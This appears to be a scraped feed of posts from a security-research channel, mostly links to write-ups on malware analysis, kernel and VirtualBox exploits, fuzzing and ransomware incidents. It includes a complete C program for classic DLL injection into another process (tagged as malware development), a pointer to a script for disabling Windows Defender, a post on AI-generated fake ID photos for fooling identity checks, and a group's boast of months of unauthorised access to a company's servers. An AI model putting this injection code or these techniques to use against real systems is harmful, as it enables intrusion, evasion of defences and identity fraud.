Source Byte

http://typeset.io #ai @islemolecule_source

Tackling Anti-Analysis Techniques of GuLoader and RedLine Stealer Link #malware_analysis @islemolecule_source

Ghidra vs Cutter vs Binary Ninja vs IDA Free Link #disassembler @islemolecule_source

VirtualBox internals and exploitation (CVE-2023-21987 and CVE-2023-21991) credit : @qriousec https://qriousec.github.io/post/vbox-pwn2own-2023/ #virtualbox

• Realistic “photos” were published on Reddit , which were generated by AI and are great for identity verification)) In one photo there is a girl with a sign, and in the second - with an ID card. • Now think about what opportunities will open up for criminals when you can buy a passport for pennies on the darknet and generate a realistic photo through AI... • In the comments you can read how the author managed to generate such images: https://www.reddit.com 👀 #informative

We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV. The website http://privacy.sexy has a copy & paste script to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment? @DebugPrivilege has written an excellent article about the various event logs Windows Defenders creates, in which event. [2] Run the commands on a test system, and look for gaps in your monitoring 🤓 [1] https://privacy.sexy [2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/ #AV , ———

Fuzz Everything, Everywhere, All at Once - Advanced QEMU-based fuzzing https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once #fuzzing #LibAFL #QEMU ——— @islemolecule_source

Rust to Assembly: Understanding the Inner Workings of Rust . collection of blog posts show how Rust code maps to Assembly https://eventhelix.com/rust/ #rust ———

SQL Brute Force Leads to BlueSky Ransomware credit : @1ZRR4H https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/

Initial Access – search-ms URI Handler credit : @hackerfantastic https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/ #initial_access , ——— @islemolecule_source

⛔We have already uploaded Cafe Bazar transactions on the channel. And if CafeBazaar did not provide strong documents, a disaster like the Snapp Food disaster was waiting for Cafe Bazaar. Therefore, the censored documents were removed from the channel. But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities Snapfood servers were vulnerable and we had access to jira.snappfood.ir and jira.snapp.ir,... for months and warned about them but they didn't pay attention. In this post, we thank the elites of SnapFood بهنام نصراللهی مهدی شکری سپهر رشادی According to our and other people's warnings, we are happy about what happened to SnappFood! 📱@APTIRAN

Unlinking Malicious DLLs from the PEB Source #malware_dev @islemolecule_source

DLL Injection via SetWindowsHookExA Source #malware_dev @islemolecule_source

DLL Injection 1- address of the dll 2- allocate a buffer in target process 3- write dll address to that 4- create a thread to execute

int main(int argc, char *argv[]) {
 HANDLE processHandle;
 PVOID remoteBuffer;
 wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
 
 printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
 processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
 remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE); 
 WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
 PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
 CloseHandle(processHandle); 
 
 return 0;
}

iredteam #malware_dev @islemolecule_source

exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250) credit: @saidelike research.nccgroup.com/2022/0… #linux , #kernel , #analysis , #exploitation __ @islemolecule_source

great burpsuite series by Meraj Heydari credit : @meraj_heydari language : persian https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0- #burpsuite , ——— @islemolecule_source

7k view & 150 likes on twitter, i really don't know what to say 🤷‍♀ Share posts plz